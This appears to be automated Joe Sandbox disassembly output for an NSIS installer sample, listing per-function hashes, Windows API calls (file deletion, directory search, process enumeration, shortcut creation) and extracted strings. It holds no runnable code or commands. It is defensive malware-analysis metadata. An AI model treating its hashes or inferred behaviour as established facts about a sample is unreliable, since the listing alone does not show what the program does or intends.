                                                  • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                  • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                  • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                  • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                  • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                  • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                  • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                  • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                  • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                  • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                  APIs
                                                  • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                  • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                                  • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                  • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $ @$M$N
                                                  • API String ID: 1638840714-3479655940
                                                  • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                  • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                  • String ID: 82D$@%F$@rD$A
                                                  • API String ID: 3347642858-1086125096
                                                  • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                  • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                  • API String ID: 1916479912-1189179171
                                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                  • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                  • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                  Strings
                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                  • \*.*, xrefs: 00406D03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                  • API String ID: 2035342205-3294556389
                                                  • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                  • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                  APIs
                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 3581403547-784952888
                                                  • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                  • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                  APIs
                                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                  Strings
                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                  • API String ID: 542301482-1377821865
                                                  • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                  • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                  • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                  • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                  • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                  • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                  • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                  • API String ID: 20674999-2124804629
                                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
